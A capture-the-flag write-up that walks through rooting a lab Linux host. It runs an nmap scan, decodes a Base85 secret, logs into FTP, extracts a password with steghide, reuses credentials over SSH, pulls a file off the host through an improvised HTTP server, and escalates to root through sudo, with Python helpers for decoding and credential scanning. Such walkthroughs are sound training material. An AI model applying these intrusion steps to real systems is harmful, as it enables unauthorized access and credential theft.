
Fileception

This engagement compromised a Linux host through service enumeration, encoding analysis, steganography extraction and a two-step privilege escalation. The attack path chained an FTP server that allowed anonymous logins, a password hidden in an image with steghide, a second password stored only base64-encoded inside a document, and an account with unrestricted sudo rights.


1. Reconnaissance

nmap -p- 172.17.0.2
PORT   STATE SERVICE
21/tcp open ftp # Anonymous access enabled
22/tcp open ssh # Potential SSH entry point
80/tcp open http # Web server for initial foothold

2. Web Server Analysis

2.1 Source Code Inspection

The web page source contained a critical comment via view-source:http://172.17.0.2/:

<!-- Base85 encoded secret: @UX=h?T9oMA7]7hA7]:YE+*g/GAhM4 -->

3. Cryptography Analysis

3.1 Base85 Identification

The encoded string exhibited characteristics of Ascii85 (Base85) encoding rather than Base64:

Characteristic        Base85 (Ascii85)                                  Base64
Alphabet              every printable from '!' to 'u', so @ ] ? : * occur   A-Z, a-z, 0-9, + and /, with = as padding
Length rule           30 characters = 6 groups of 5 (24 decoded bytes)  length must be a multiple of 4 (padded with =)
Commonality           less common in the wild                            ubiquitous

The decisive check is the alphabet: ?, @, ] and : are not valid Base64 symbols, so Base64 is ruled out outright. A length that is a multiple of 5 with no <~ ~> wrapper points to plain (non-Adobe) Ascii85.

Eliminated Alternatives:

  • Base32: uppercase A-Z and digits 2-7 only, no symbols
  • Base16: hexadecimal characters only

3.2 Decoding Process

Python script using the a85decode method:

decode_base85.py
from base64 import a85decode

encoded = "@UX=h?T9oMA7]7hA7]:YE+*g/GAhM4"
decoded = a85decode(encoded, adobe=False).decode('utf-8')
# adobe=False: the string is not wrapped in the Adobe <~ ... ~> delimiters
print(decoded)  # Output: base_85_decoded_password
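The alphabet and length rules from 3.1 and the decode in 3.2 can be folded into one tool that reports every encoding a blob could be, decodes it, and sweeps HTML comments for such blobs. The script below is an added example written for this page, not code from the original writeup; the sample HTML is constructed around the comment the page quotes, and the 16-character minimum token length is an arbitrary noise filter.

```python
"""Identify the BaseN alphabet a blob fits, decode it, and scan HTML comments.

Added example (not part of the original writeup).  The candidate string is
the one from the page's HTML comment; the decision rules are the
alphabet/length checks from section 3.1.
"""
import base64
import re
import string

# Alphabets, narrowest first.  A string that fits a narrow alphabet also fits
# wider ones, so every passing candidate is reported, not just the first.
ALPHABETS = {
    "base16": set(string.hexdigits),
    "base32": set(string.ascii_uppercase + "234567="),
    "base64": set(string.ascii_letters + string.digits + "+/="),
    # Ascii85 uses every printable from '!' (33) to 'u' (117); 'z' is the
    # shorthand for four zero bytes.
    "ascii85": {chr(c) for c in range(33, 118)} | {"z"},
}

# Constructed sample page: the comment the writeup found plus a harmless one.
SAMPLE_HTML = """<html><body>
<!-- Base85 encoded secret: @UX=h?T9oMA7]7hA7]:YE+*g/GAhM4 -->
<!-- TODO: remove before prod -->
</body></html>"""


def candidate_encodings(s: str) -> list[str]:
    """Return the encodings whose alphabet and length rules accept `s`."""
    hits = []
    for name, alphabet in ALPHABETS.items():
        if not set(s) <= alphabet:
            continue
        if name == "base16" and len(s) % 2:
            continue
        if name == "base32" and len(s) % 8:
            continue
        if name == "base64" and len(s) % 4:
            continue
        # Ascii85: a trailing partial group holds 2..4 chars, never exactly 1.
        if name == "ascii85" and len(s) % 5 == 1:
            continue
        hits.append(name)
    return hits


def try_decode(s: str) -> dict[str, bytes]:
    """Attempt every candidate decoding of `s`; keep the ones that succeed."""
    decoders = {
        "base16": lambda x: base64.b16decode(x.upper()),
        "base32": base64.b32decode,
        "base64": lambda x: base64.b64decode(x, validate=True),
        "ascii85": lambda x: base64.a85decode(x, adobe=False),
    }
    results = {}
    for name in candidate_encodings(s):
        try:
            results[name] = decoders[name](s)
        except ValueError:  # binascii.Error is a ValueError subclass
            pass
    return results


def scan_html_comments(html: str, min_len: int = 16) -> list[tuple[str, str, str]]:
    """Find comment tokens that decode to printable ASCII under some encoding."""
    found = []
    for comment in re.findall(r"<!--(.*?)-->", html, re.S):
        for token in comment.split():
            if len(token) < min_len:  # skip ordinary words
                continue
            for enc, raw in try_decode(token).items():
                try:
                    text = raw.decode("ascii")
                except UnicodeDecodeError:
                    continue
                if text.isprintable():
                    found.append((token, enc, text))
    return found


if __name__ == "__main__":
    for token, enc, text in scan_html_comments(SAMPLE_HTML):
        print(f"{enc}: {token} -> {text}")
```

Run against a real page, feed it the raw HTML (for example the output of `curl -s`) instead of SAMPLE_HTML; the printable-ASCII filter is what keeps short tokens that happen to be valid Ascii85 out of the report.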

4. FTP Exploitation

4.1 Anonymous Access

Logging in as the anonymous user and supplying the decoded string when prompted for a password:

ftp anonymous@172.17.0.2  # Password: base_85_decoded_password
ftp> get hello_peter.jpg # Retrieve the steganography carrier

5. Steganography Analysis

5.1 Data Extraction with Steghide

Extracted hidden data using the previously decoded password:

steghide extract -sf hello_peter.jpg
# Passphrase: base_85_decoded_password
# Output: you_find_me.txt

Extracted Data:

An Ook!-encoded message, which decodes to: 9h889h23hhss2

Tooling Note:
Ook! is an esoteric programming language, a Brainfuck dialect in which each instruction is a pair of the tokens "Ook.", "Ook?" and "Ook!"; it turns up regularly in CTF encoding puzzles. The message was decoded with dcode.fr's Ook! translator.


6. SSH Access

6.1 Credential Reuse

The password recovered from the image was reused for the peter account, giving the first shell on the host:

ssh peter@172.17.0.2  # Password: 9h889h23hhss2

7. Privilege Escalation

7.1 File Discovery in /tmp

Found critical files via directory inspection:

ls -al /tmp
  • importante_octopus.odt: ODT document (ZIP archive)
  • recuerdos_del_sysadmin.txt: Red herring text file

7.2 Document Container Inspection

  1. On the target, served /tmp over HTTP so the document could be pulled back to the attacking host:
    cd /tmp
    python3 -m http.server 6666
  2. On the attacking host, retrieved the document and unpacked it (an ODT file is a ZIP container):
    wget http://$TARGET_IP:6666/importante_octopus.odt
    file importante_octopus.odt # ZIP container (OpenDocument)
    unzip importante_octopus.odt -d extracted/
  3. Located credentials in extracted/leerme.xml:
    usuario: octopus
    password: ODBoMjM4MGgzNHVvdW8zaDQ= # Base64 encoded, not encrypted

7.3 Credential Decoding

echo "ODBoMjM4MGgzNHVvdW8zaDQ=" | base64 -d
# Output: 80h2380h34uouo3h4
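Manually unzipping and grepping works for one file; the same check can be automated so that every XML member of an OpenDocument container is searched for credential-looking fields and any base64 values among them are decoded. The script below is an added example for this page, not the original author's tooling. It builds the document in memory so it runs offline: the member name leerme.xml, the username octopus and the base64 password are the ones the page reports, while the container layout, the XML element names and the list of credential keywords are constructed assumptions.

```python
"""Scan an OpenDocument (ZIP) container for XML members holding credentials.

Added example, not part of the original writeup.  The sample ODT is built
in memory; only the member name, username and base64 string come from the
page, the rest of the layout is constructed.
"""
import base64
import io
import re
import zipfile

B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
CRED_KEY = re.compile(r"(usuario|user|username|password|contrase[nñ]a|pass)", re.I)
# Matches either <tag>value</tag> or 'key: value' pairs inside an XML member.
PAIR = re.compile(r"<(\w+)>([^<]+)</\1>|(\w+)\s*:\s*(\S+)")


def build_sample_odt() -> bytes:
    """Construct a minimal ODT-shaped archive containing a leaked credential."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        # ODF requires 'mimetype' to be the first member and stored uncompressed.
        z.writestr(zipfile.ZipInfo("mimetype"),
                   "application/vnd.oasis.opendocument.text",
                   compress_type=zipfile.ZIP_STORED)
        z.writestr("content.xml", "<office:document-content/>",
                   compress_type=zipfile.ZIP_DEFLATED)
        z.writestr("leerme.xml",
                   "<creds><usuario>octopus</usuario>"
                   "<password>ODBoMjM4MGgzNHVvdW8zaDQ=</password></creds>",
                   compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def is_odf(data: bytes) -> bool:
    """True if the ZIP follows the ODF convention (mimetype member first)."""
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        names = z.namelist()
        return bool(names) and names[0] == "mimetype" and \
            z.read("mimetype").startswith(b"application/vnd.oasis.opendocument")


def decode_b64_if_text(token: str):
    """Return the decoded text if `token` is valid base64 for printable ASCII."""
    try:
        raw = base64.b64decode(token, validate=True)
    except ValueError:
        return None
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if text.isprintable() else None


def find_secrets(data: bytes) -> list[tuple[str, str, str, object]]:
    """Return (member, key, raw value, decoded-or-None) for credential-like fields."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for info in z.infolist():
            if not info.filename.lower().endswith(".xml"):
                continue
            text = z.read(info).decode("utf-8", errors="replace")
            for m in PAIR.finditer(text):
                key = m.group(1) or m.group(3)
                value = m.group(2) or m.group(4)
                if not CRED_KEY.search(key):
                    continue
                decoded = decode_b64_if_text(value) if B64_TOKEN.fullmatch(value) else None
                hits.append((info.filename, key, value, decoded))
    return hits


if __name__ == "__main__":
    odt = build_sample_odt()
    print("ODF container:", is_odf(odt))
    for member, key, value, decoded in find_secrets(odt):
        print(f"{member}: {key} = {value}" + (f"  (base64 -> {decoded})" if decoded else ""))
```

To use it on a real download, read the file's bytes and pass them to find_secrets(); a value that fails the strict base64 check is still reported, just without a decoded form.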

7.4 Sudo Misconfiguration

After switching to the octopus account with the decoded password, sudo -l showed unrestricted sudo rights, which is enough to spawn a root shell directly:

sudo -l  # Revealed unrestricted sudo access for octopus
sudo su  # Gained root privileges

8. Vulnerability Chain Summary

Step  Vulnerability Class            Impact
1     Anonymous FTP Access           Initial Foothold
2     Steganography Practices        Credential Exposure
3     Base64 Password Storage        Lateral Movement
4     Excessive Sudo Privileges      Privilege Escalation